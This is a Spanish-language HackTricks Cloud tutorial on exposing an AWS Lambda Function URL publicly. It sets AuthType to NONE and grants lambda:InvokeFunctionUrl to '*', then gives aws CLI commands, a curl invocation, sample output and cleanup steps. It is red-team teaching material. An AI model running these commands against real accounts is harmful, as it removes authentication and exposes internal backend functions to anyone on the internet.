AWS - Lambda Function URL Public Exposure (AuthType NONE + Public Invoke Policy)

Tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

• Consulta los subscription plans!
• Únete al 💬 Discord group o al telegram group o síguenos en Twitter 🐦 @hacktricks_live.
• Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud github repos.

Convierte una Function URL de Lambda privada en un endpoint público no autenticado cambiando el AuthType de la Function URL a NONE y adjuntando una policy basada en recursos que otorgue lambda:InvokeFunctionUrl a todos. Esto permite la invocación anónima de funciones internas y puede exponer operaciones sensibles del backend.

Explotación

• Requisitos previos: lambda:UpdateFunctionUrlConfig, lambda:CreateFunctionUrlConfig, lambda:AddPermission
• Region: us-east-1

Pasos

1. Asegúrate de que la función tenga una Function URL (por defecto AWS_IAM):

aws lambda create-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true

2. Cambia la URL a pública (AuthType NONE):

aws lambda update-function-url-config --function-name $TARGET_FN --auth-type NONE

3. Añade una declaración de policy basada en recursos para permitir principals no autenticados:

aws lambda add-permission --function-name $TARGET_FN --statement-id ht-public-url --action lambda:InvokeFunctionUrl --principal "*" --function-url-auth-type NONE

4. Recupera la URL e invoca sin credenciales:

URL=$(aws lambda get-function-url-config --function-name $TARGET_FN --query FunctionUrl --output text)
curl -sS "$URL"

Impacto

• La función Lambda pasa a ser accesible de forma anónima a través de internet.

Ejemplo de salida (200 no autenticado)

HTTP 200
https://e3d4wrnzem45bhdq2mfm3qgde40rjjfc.lambda-url.us-east-1.on.aws/
{"message": "HackTricks demo: public Function URL reached", "timestamp": 1759761979, "env_hint": "us-east-1", "event_keys": ["version", "routeKey", "rawPath", "rawQueryString", "headers", "requestContext", "isBase64Encoded"]}

Limpieza

aws lambda remove-permission --function-name $TARGET_FN --statement-id ht-public-url || true
aws lambda update-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true

Tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

• Consulta los subscription plans!
• Únete al 💬 Discord group o al telegram group o síguenos en Twitter 🐦 @hacktricks_live.
• Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud github repos.